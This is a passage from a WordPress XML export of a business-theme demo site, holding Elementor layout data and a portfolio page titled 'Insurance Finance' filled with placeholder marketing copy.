brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3071a763","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"828a94c","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"53d504ac","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"4d6cc997","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f023b1","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"177fdce1","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e8ca3c2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7f78bab3","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"409d65b1","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"30db82d2","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"40a8f280","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4dfc12a3","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6ec964ab","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"14da4924","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"effadd0","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"54f34259","elType":"section","settings":[],"elements":[{"id":"14b20d61","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1c0adcf5","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5760d96e","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3446b2d8","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"58d8d92b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f8e61fd","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"466ee2f9","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6a099d80","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"20035f3e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7dbf4864","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4b3d7621","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5bf96fcd","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"407b340","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"40da3e37","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7090a0cd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7b761b80","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"651d3fd7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"73c21160","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5da19178","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"43ab1ed5","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1711b718","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"54c05c94","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"6b0e1064","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"ba5ffbb","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Insurance Finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/insurance-finance/</link>
		<pubDate>Fri, 11 Sep 2020 04:48:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=818</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 09, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>818</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:48:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:48:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[insurance-finance]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[819]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"927f8df","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"6791ad66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"445a200a","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"5789d963","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"788454d6","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"42dad2ce","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1e8fb8bb","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bd5ee3e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"25002852","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c55a945","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2736d520","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3616c54e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"21d1388b","elType":"widget","settings":{"editor":"<p>November 09, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"55401017","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16c4f4c6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"307fcf31","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"3b72cfa8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"434e61f3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"c912322","elType":"section","settings":[],"elements":[{"id":"238753ad","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"125545d8","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cdd0a74","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. 